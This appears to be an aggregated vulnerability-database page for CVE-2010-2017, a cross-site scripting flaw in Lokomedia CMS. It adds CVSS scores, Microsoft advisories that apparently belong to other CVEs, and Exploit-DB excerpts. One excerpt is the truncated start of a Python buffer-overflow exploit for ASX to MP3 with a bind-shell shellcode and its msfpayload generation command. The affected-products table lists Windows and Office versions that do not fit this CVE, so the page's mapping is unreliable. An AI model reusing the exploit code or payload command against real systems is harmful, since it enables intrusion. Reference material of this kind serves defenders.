CVE-2010-2017
Published 2010-05-24
CVE-2010-2017: Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML…
Priority P4 · 13 · medium · 4.3 CVSS 2.0
AV:N/AC:M/Au:N/C:N/I:P/A:N
EPSS 1.07% (60.8th percentile)
Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML via the kata parameter. NOTE: some of these details are obtained from third party information.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bukulokomedia | lokomedia_cms | — | — |
| bukulokomedia | lokomedia_cms | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_compatibility_pack_service_pack_3 | — | — |
| msrc | microsoft_office_web_apps_server_2010_service_pack_2 | — | — |
| msrc | microsoft_office_word_viewer | — | — |
| msrc | microsoft_word_2007_service_pack_3 | — | — |
| msrc | microsoft_word_2010_service_pack_2 | — | — |
| msrc | microsoft_word_for_mac_2011 | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1511 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1703 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
| msrc | windows_server_2012_r2 | — | — |
| msrc | windows_server_2016 | — | — |
| msrc | word_automation_services_on_microsoft_sharepoint_server_2010_service_pack_2 | — | — |
CVSS provenance
nvd · v2.0 · 4.3 · MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_msrc · 5.5 · HIGH
GHSA
GHSA-4rvw-87w8-xp4x: Cross-site scripting (XSS) vulnerability in hasil-pencarian
ghsa_unreviewed·2022-05-17
CVE-2010-2017 [MEDIUM] CWE-79 GHSA-4rvw-87w8-xp4x: Cross-site scripting (XSS) vulnerability in hasil-pencarian
Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML via the kata parameter. NOTE: some of these details are obtained from third party information.
Microsoft
Windows Uniscribe Information Disclosure Vulnerability
vendor_msrc·2017-06-13·CVSS 4.4
CVE-2017-0285 [MEDIUM] Windows Uniscribe Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.
The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.
FAQ: I am running Office 2010, which is listed as affected software. Why am I not being offered the update?
The update, 3191848 (Ogl.dll), is not applicable to Office 2010 on Windows Server 2008 a
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2017-03-14·CVSS 5.5
CVE-2017-0105 [MEDIUM] Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3178686 update?
The 3178686 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
No detection rules found.
Exploit-DB
ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow
exploitdb·2017-10-11·CVSS 7.8
CVE-2017-15221 [HIGH] ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow
---
# Exploit Title: Buffer Overflow via crafted malicious .m3u file
# Exploit Author: Parichay Rai
# Tested on: XP Service Pack 3
# CVE : CVE-2017-15221
Description
A buffer overflow attack is possible due to an improper input mechanism
Proof of Concept
#!/usr/bin/python
#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
#This is an exploit that works well against Windows XP3 systems!
#Successful exploit gives you a bind shell on 4444
BadChar= "\x00\x0a\x0d\x20"
# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c
# Successful exploitation opens port 4444 on the victim Machine
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\
Exploit-DB
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
exploitdb·2017-03-27·CVSS 3.5
CVE-2017-2619 [LOW] Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039
The Samba server is supposed to only grant access to configured share
directories unless "wide links" are enabled, in which case the server is allowed
to follow symlinks. The default (since CVE-2010-0926) is that wide links are
disabled.
smbd ensures that it isn't following symlinks by calling lstat() on every
path component, as can be seen in strace (in reaction to the request
"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share):
root@debian:/home/user# strace -e trace=file -p18954
Process 18954 attached
lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
getcwd("/public", 4096) = 8
lstat("/pub
No writeups or analysis indexed.